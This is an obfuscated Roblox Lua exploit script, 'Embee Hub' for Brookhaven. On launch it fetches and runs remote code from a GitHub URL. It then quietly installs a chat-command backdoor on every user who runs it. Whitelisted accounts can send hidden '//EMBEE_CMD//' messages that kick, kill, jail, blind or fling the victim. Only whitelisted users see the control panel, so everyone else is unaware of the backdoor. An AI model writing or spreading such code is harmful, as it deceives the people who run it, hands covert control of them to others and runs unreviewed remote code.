--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

loadstring(game:HttpGet("https://raw.githubusercontent.com/Frost230/Embee/refs/heads/main/Wbook"))();local v0=game:GetService("Players");local v1=v0.LocalPlayer;local v2=game:GetService("TextChatService");local v3=game:GetService("Workspace");local v4={tokitooff29="Developer",bianovo98765="Developer",adm_most3="Friend",olliver2045judoca="Developer",lucasgakmes2="Friend",darkizinho9910="Friend",Homem_misterios025="Girl by frost",magnata_luam="Influenciador",mighuf3="Friend"};local function v5(v15) if  not v4[v15.Name] then return;end if  not v15.Character then return;end local function v16() if  not v15.Character then return;end if v15.Character:FindFirstChild("EmbeeTag") then return;end local v42=v15.Character:FindFirstChild("Head");if  not v42 then return;end local v43=Instance.new("BillboardGui");v43.Name="EmbeeTag";v43.Size=UDim2.new(0,37 + 113 ,0 + 0 ,28);v43.StudsOffset=Vector3.new(1530 -(568 + 962) ,8 -5 ,0);v43.AlwaysOnTop=true;v43.Adornee=v42;local v49=Instance.new("TextLabel");v49.Size=UDim2.fromScale(2 -1 ,1 + 0 );v49.BackgroundTransparency=1955 -(508 + 1446) ;v49.Text="["   .. v4[v15.Name]   .. "]" ;v49.Font=Enum.Font.GothamBold;v49.TextScaled=true;v49.TextColor3=Color3.fromRGB(186 + 69 ,90,997 -(915 + 82) );v49.TextStrokeTransparency=0.3;v49.Parent=v43;v43.Parent=v15.Character;end v16();local v17=v15.Character:FindFirstChildOfClass("Humanoid");if v17 then v17.Died:Connect(function() task.delay(2 -1 ,v16);end);end v15.Character.ChildRemoved:Connect(function(v61) if (v61.Name=="EmbeeTag") then task.delay(0.2 + 0 ,v16);end end);end for v18,v19 in ipairs(v0:GetPlayers()) do v19.CharacterAdded:Connect(function() local v62=0 -0 ;while true do if (v62==0) then task.wait(0.5);v5(v19);break;end end end);if v19.Character then v5(v19);end end v0.PlayerAdded:Connect(function(v20) v20.CharacterAdded:Connect(function() task.wait(1187.5 -(1069 + 118) );v5(v20);end);end);local function v6(v21,v22) local v23=0;local v24;while true do if (v23==(2 -1)) then if (v22 and (v22~="")) then v24:SendAsync("//EMBEE_CMD//"   .. v21   .. " "   .. v22 );else v24:SendAsync("//EMBEE_CMD//"   .. v21 );end break;end if (v23==0) then v24=v2.TextChannels:FindFirstChild("RBXGeneral") or v2.TextChannels:GetChildren()[1] ;if  not v24 then return;end v23=1 -0 ;end end end local function v7(v25,v26) local v27=v1.Character;local v28=v27 and v27:FindFirstChildOfClass("Humanoid") ;local v29=v27 and v27:FindFirstChild("HumanoidRootPart") ;if  not v27 then return;end if (v25=="kick") then v1:Kick("🔥 Você foi removido por um administrador Embee Hub.");return;end if (v25=="kill") then v27:BreakJoints();elseif (v25=="respawn") then v1:LoadCharacter();elseif ((v25=="bring") and v29) then local v71=0 + 0 ;local v72;while true do if (v71==0) then v72=v0:FindFirstChild(v26);if (v72 and v72.Character and v72.Character:FindFirstChild("HumanoidRootPart")) then v29.CFrame=v72.Character.HumanoidRootPart.CFrame * CFrame.new(0,0 -0 , -(3 + 0)) ;end break;end end elseif ((v25=="freeze") and v28) then v28.WalkSpeed=0;elseif ((v25=="unfreeze") and v28) then v28.WalkSpeed=16;elseif ((v25=="speed") and v28) then v28.WalkSpeed=841 -(368 + 423) ;elseif ((v25=="ws") and v28) then v28.WalkSpeed=25;elseif ((v25=="jp") and v28) then v28.JumpPower=100;elseif ((v25=="sit") and v28) then v28.Sit=true;elseif ((v25=="jump") and v28) then v28.Jump=true;elseif ((v25=="god") and v28) then v28.MaxHealth=math.huge;v28.Health=math.huge;elseif ((v25=="ungod") and v28) then local v84=0;while true do if (v84==0) then v28.MaxHealth=314 -214 ;v28.Health=100;break;end end elseif ((v25=="explode") and v29) then local v85=Instance.new("Explosion",workspace);v85.Position=v29.Position;elseif ((v25=="fling") and v29) then v29.CFrame=CFrame.new(18 -(10 + 8) , -500,0);local v91=Instance.new("BodyVelocity",v29);v91.Velocity=Vector3.new(0 -0 ,1442 -(416 + 26) ,0 -0 );v91.MaxForce=Vector3.new(429151491 + 570848509 ,1811050595 -811050595 ,1000000658 -(161 + 497) );task.delay(201.5 -(43 + 158) ,function() v91:Destroy();end);elseif (v25=="blind") then local v94=Instance.new("ScreenGui",v1.PlayerGui);v94.Name="Blind";local v96=Instance.new("Frame",v94);v96.Size=UDim2.fromScale(3 -2 ,1);v96.BackgroundColor3=Color3.new(0 + 0 ,772 -(201 + 571) ,0);elseif (v25=="unblind") then local v99=1138 -(116 + 1022) ;local v100;while true do if ((0 -0)==v99) then v100=v1.PlayerGui:FindFirstChild("Blind");if v100 then v100:Destroy();end break;end end elseif ((v25=="jail") and v29) then if  not _G.EmbeePrisioneiros then _G.EmbeePrisioneiros={};end _G.EmbeePrisioneiros[v1.Name]=true;local function v101() local v102=v1.Character;if  not v102 then return;end local v103=v102:FindFirstChild("HumanoidRootPart");if  not v103 then return;end local v104=workspace:FindFirstChild("EmbeeJail_"   .. v1.Name );if v104 then v104:Destroy();end local v105=Instance.new("Model",workspace);v105.Name="EmbeeJail_"   .. v1.Name ;local v107=10;local v108=v103.Position;_G.EmbeeJailPosition=_G.EmbeeJailPosition or {} ;_G.EmbeeJailPosition[v1.Name]=v108;for v137=1 + 0 ,14 -10  do local v138=Instance.new("Part",v105);v138.Size=Vector3.new(v107,v107,0.3 -0 );v138.Anchored=true;v138.CanCollide=true;v138.Material=Enum.Material.Neon;v138.Color=Color3.fromRGB(1114 -(814 + 45) ,0 -0 ,0);v138.Transparency=0.3 + 0 ;v138.CastShadow=false;if (v137==1) then v138.CFrame=CFrame.new(v108.X,v108.Y,v108.Z + (v107/2) );elseif (v137==(1 + 1)) then v138.CFrame=CFrame.new(v108.X,v108.Y,v108.Z-(v107/(887 -(261 + 624))) );elseif (v137==(4 -1)) then v138.CFrame=CFrame.new(v108.X + (v107/(1082 -(1020 + 60))) ,v108.Y,v108.Z) * CFrame.Angles(1423 -(630 + 793) ,math.rad(304 -214 ),0 -0 ) ;else v138.CFrame=CFrame.new(v108.X-(v107/2) ,v108.Y,v108.Z) * CFrame.Angles(0,math.rad(36 + 54 ),0) ;end end local v109=Instance.new("Part",v105);v109.Size=Vector3.new(v107,0.3 -0 ,v107);v109.CFrame=CFrame.new(v108.X,v108.Y + (v107/(1749 -(760 + 987))) ,v108.Z);v109.Anchored=true;v109.CanCollide=true;v109.Material=Enum.Material.Neon;v109.Color=Color3.fromRGB(2168 -(1789 + 124) ,0,766 -(745 + 21) );v109.Transparency=0.3 + 0 ;v109.CastShadow=false;local v119=Instance.new("Part",v105);v119.Size=Vector3.new(v107,0.3 -0 ,v107);v119.CFrame=CFrame.new(v108.X,v108.Y-(v107/(7 -5)) ,v108.Z);v119.Anchored=true;v119.CanCollide=true;v119.Material=Enum.Material.Neon;v119.Color=Color3.fromRGB(2 + 178 ,0,0);v119.Transparency=0.4 + 0 ;v119.CastShadow=false;local v128=Instance.new("ParticleEmitter",v109);v128.Texture="rbxasset://textures/particles/sparkles_main.dds";v128.Color=ColorSequence.new(Color3.fromRGB(1310 -(87 + 968) ,0,0));v128.Rate=20;v128.Lifetime=NumberRange.new(4 -3 ,2 + 0 );v128.Speed=NumberRange.new(1,6 -3 );v128.SpreadAngle=Vector2.new(1593 -(447 + 966) ,180);v128.Size=NumberSequence.new(0.5);v128.Transparency=NumberSequence.new(0.5 -0 );end v101();if  not _G.EmbeeAntiEscape then _G.EmbeeAntiEscape=game:GetService("RunService").Heartbeat:Connect(function() if (_G.EmbeePrisioneiros and _G.EmbeePrisioneiros[v1.Name]) then local v150=v1.Character;if v150 then local v152=v150:FindFirstChild("HumanoidRootPart");local v153=v150:FindFirstChildOfClass("Humanoid");if (v152 and _G.EmbeeJailPosition[v1.Name]) then local v156=1817 -(1703 + 114) ;local v157;local v158;local v159;while true do if (v156==(702 -(376 + 325))) then v159=(v158-v157).Magnitude;if (v159>(0.5 -0)) then v152.CFrame=CFrame.new(v157);v152.Velocity=Vector3.new(0 -0 ,0 + 0 ,0 -0 );v152.RotVelocity=Vector3.new(0,14 -(9 + 5) ,376 -(85 + 291) );if v153 then v153.WalkSpeed=1265 -(243 + 1022) ;v153.JumpPower=0 -0 ;v153.JumpHeight=0 + 0 ;end for v165,v166 in pairs(v152:GetChildren()) do if (v166:IsA("BodyMover") or v166:IsA("BodyVelocity") or v166:IsA("BodyPosition") or v166:IsA("BodyGyro")) then v166:Destroy();end end for v167,v168 in pairs(v150:GetDescendants()) do if v168:IsA("BodyMover") then v168:Destroy();end end end break;end if (0==v156) then v157=_G.EmbeeJailPosition[v1.Name];v158=v152.Position;v156=1181 -(1123 + 57) ;end end end end end end);end if  not _G.EmbeeJailConnection then _G.EmbeeJailConnection=v1.CharacterAdded:Connect(function() task.wait(0.5 + 0 );if (_G.EmbeePrisioneiros and _G.EmbeePrisioneiros[v1.Name]) then v101();end end);end elseif (v25=="unjail") then local v147=254 -(163 + 91) ;local v148;while true do if (1==v147) then v148=workspace:FindFirstChild("EmbeeJail_"   .. v1.Name );if v148 then v148:Destroy();end break;end if (v147==(1930 -(1869 + 61))) then if _G.EmbeePrisioneiros then _G.EmbeePrisioneiros[v1.Name]=nil;end if _G.EmbeeJailPosition then _G.EmbeeJailPosition[v1.Name]=nil;end v147=1 + 0 ;end end end end local function v8(v30) local v31=0 -0 ;local v32;local v33;while true do if (v31==(2 -0)) then if  not v32 then return;end v32=v32:lower();v31=1 + 2 ;end if (v31==1) then if  not v30.Text:match("^//EMBEE_CMD//") then return;end v32,v33=v30.Text:match("//EMBEE_CMD//(%S+)%s*(%S*)");v31=2;end if (v31==(0 -0)) then if ( not v30.Text or  not v30.TextSource) then return;end if  not v4[v30.TextSource.Name] then return;end v31=1;end if (v31==4) then if (v33~="") then if (v33==v1.Name:lower()) then v7(v32,v30.TextSource.Name);end else v7(v32,v30.TextSource.Name);end break;end if (v31==(3 + 0)) then v33=(v33 and v33:lower()) or "" ;if (v32=="verifique") then local v69=1474 -(1329 + 145) ;local v70;while true do if (v69==(972 -(140 + 831))) then return;end if (v69==0) then v70=v2.TextChannels:FindFirstChild("RBXGeneral") or v2.TextChannels:GetChildren()[1851 -(1409 + 441) ] ;if v70 then v70:SendAsync("🔥 Embee_Cliente_ON | "   .. v1.Name );end v69=719 -(15 + 703) ;end end end v31=4;end end end for v34,v35 in ipairs(v2.TextChannels:GetChildren()) do if v35:IsA("TextChannel") then v35.MessageReceived:Connect(v8);end end if  not v4[v1.Name] then return;end local v9=loadstring(game:HttpGet("https://github.com/Footagesus/WindUI/releases/latest/download/main.lua"))();local v10=game:GetService("RunService");local v11=game:GetService("ReplicatedStorage");v9:AddTheme({Name="Dark Red Theme",Background=Color3.fromRGB(3 + 3 ,0,0),WindowBackground=Color3.fromRGB(448 -(262 + 176) ,1721 -(345 + 1376) ,688 -(198 + 490) ),DialogBackground=Color3.fromRGB(52 -40 ,0 -0 ,1206 -(696 + 510) ),TabBackground=Color3.fromRGB(16 -8 ,1262 -(1091 + 171) ,0 + 0 ),ElementBackground=Color3.fromRGB(62 -42 ,0 -0 ,0),PopupBackground=Color3.fromRGB(386 -(123 + 251) ,0 -0 ,698 -(208 + 490) ),Accent=Color3.fromRGB(14 + 146 ,0,0 + 0 ),Outline=Color3.fromRGB(876 -(660 + 176) ,0 + 0 ,202 -(14 + 188) ),Text=Color3.fromRGB(255,930 -(534 + 141) ,255),Placeholder=Color3.fromRGB(180,0 + 0 ,0 + 0 ),Button=Color3.fromRGB(24,0 + 0 ,0 -0 ),Icon=Color3.fromRGB(317 -117 ,0,0 -0 ),BackgroundTransparency=0.05,Hover=Color3.fromRGB(17 + 13 ,0,0 + 0 ),WindowShadow=Color3.fromRGB(0,0,396 -(115 + 281) ),DialogBackgroundTransparency=0.05,DialogTitle=Color3.fromRGB(593 -338 ,212 + 43 ,616 -361 ),DialogContent=Color3.fromRGB(935 -680 ,255,1122 -(550 + 317) ),DialogIcon=Color3.fromRGB(288 -88 ,0 -0 ,0),WindowTopbarButtonIcon=Color3.fromRGB(558 -358 ,0,0),WindowTopbarTitle=Color3.fromRGB(255,255,540 -(134 + 151) ),WindowTopbarAuthor=Color3.fromRGB(1865 -(970 + 695) ,0,0 -0 ),WindowTopbarIcon=Color3.fromRGB(2190 -(582 + 1408) ,0 -0 ,0 -0 ),TabTitle=Color3.fromRGB(960 -705 ,2079 -(1195 + 629) ,336 -81 ),TabIcon=Color3.fromRGB(441 -(187 + 54) ,0,0),ElementTitle=Color3.fromRGB(1035 -(162 + 618) ,179 + 76 ,170 + 85 ),ElementDesc=Color3.fromRGB(469 -249 ,100 -40 ,5 + 55 ),ElementIcon=Color3.fromRGB(200,1636 -(1373 + 263) ,1000 -(451 + 549) ),PopupBackgroundTransparency=0.05 + 0 ,PopupTitle=Color3.fromRGB(396 -141 ,255,255),PopupContent=Color3.fromRGB(428 -173 ,1639 -(746 + 638) ,255),PopupIcon=Color3.fromRGB(76 + 124 ,0,0 -0 ),DialogButton=Color3.fromRGB(371 -(218 + 123) ,0,1581 -(1535 + 46) ),DialogButtonText=Color3.fromRGB(254 + 1 ,255,255),DialogButtonHover=Color3.fromRGB(8 + 42 ,560 -(306 + 254) ,0 + 0 ),PopupButton=Color3.fromRGB(58 -28 ,1467 -(899 + 568) ,0 + 0 ),PopupButtonText=Color3.fromRGB(617 -362 ,858 -(268 + 335) ,545 -(60 + 230) ),PopupButtonHover=Color3.fromRGB(50,572 -(426 + 146) ,0)});local v12=v9:CreateWindow({Title="Embee Hub | Brookhaven",Icon="zap",Author="",Folder="Linuxhub",Size=UDim2.fromOffset(75 + 545 ,1956 -(282 + 1174) ),Transparent=true,Theme="Dark Red Theme",Resizable=true,MinimizeKey=Enum.KeyCode.RightControl,Background="rbxassetid://82050163196263",User={Enabled=true,Anonymous=false,Callback=function() end}});v12:EditOpenButton({Title="Embee Hub",Icon="zap",CornerRadius=UDim.new(0,827 -(569 + 242) ),StrokeThickness=5 -3 ,Color=ColorSequence.new({ColorSequenceKeypoint.new(0,Color3.fromRGB(1104 -(706 + 318) ,0,1251 -(721 + 530) )),ColorSequenceKeypoint.new(0.5,Color3.fromRGB(160,0 -0 ,0)),ColorSequenceKeypoint.new(701 -(271 + 429) ,Color3.fromRGB(74 + 6 ,1500 -(1408 + 92) ,1086 -(461 + 625) ))}),OnlyMobile=false,Enabled=true,Draggable=true});local function v13() local v36={};for v63,v64 in ipairs(v0:GetPlayers()) do table.insert(v36,v64.Name);end return v36;end local function v14(v37,v38) return v37:Dropdown({Title="Selecionar Jogador",Values=v13(),Callback=v38});end do local v39=v12:Tab({Title="Comandos",Icon="rbxassetid://10709781460"});local v40=v39:Section({Title="Ações de Controle",Opened=true});local v41;v14(v40,function(v65) v41=v65;end);v40:Button({Title="Verificar",Desc="Verifica quem está com o código ativo",Icon="rbxassetid://10734950309",Callback=function() v6("verifique","");end});v40:Button({Title="Kick",Desc="Remove o jogador do servidor",Icon="rbxassetid://10747384394",Callback=function() if v41 then v6("kick",v41);v12:Notify({Title="Comando Enviado",Content="Kick enviado para: "   .. v41 ,Duration=1291 -(993 + 295) });else v12:Notify({Title="Erro",Content="Selecione um jogador primeiro!",Duration=3});end end});for v66,v67 in ipairs({{cmd="Kill",desc="Mata o jogador",icon="rbxassetid://10709790644"},{cmd="Bring",desc="Traz o jogador até você",icon="rbxassetid://10734884548"},{cmd="Explode",desc="Explode o jogador",icon="rbxassetid://10723434711"},{cmd="Fling",desc="Arremessa o jogador",icon="rbxassetid://10709770005"},{cmd="Jail",desc="Prende o jogador",icon="rbxassetid://10723345518"},{cmd="Unjail",desc="Solta o jogador da prisão",icon="rbxassetid://10723346959"},{cmd="Blind",desc="Tela preta",icon="rbxassetid://10709782497"},{cmd="Unblind",desc="Remove tela preta",icon="rbxassetid://10723407389"}}) do v40:Button({Title=v67.cmd,Desc=v67.desc,Icon=v67.icon,Callback=function() if v41 then local v68=0 + 0 ;while true do if (v68==(529 -(406 + 123))) then v6(v67.cmd,v41);v12:Notify({Title="Comando Enviado",Content=v67.cmd   .. " enviado para: "   .. v41 ,Duration=1772 -(1749 + 20) });break;end end else v12:Notify({Title="Erro",Content="Selecione um jogador primeiro!",Duration=1 + 2 });end end});end end
